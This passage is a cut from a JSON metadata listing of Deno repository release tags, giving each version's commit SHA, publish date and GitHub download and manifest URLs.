:"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_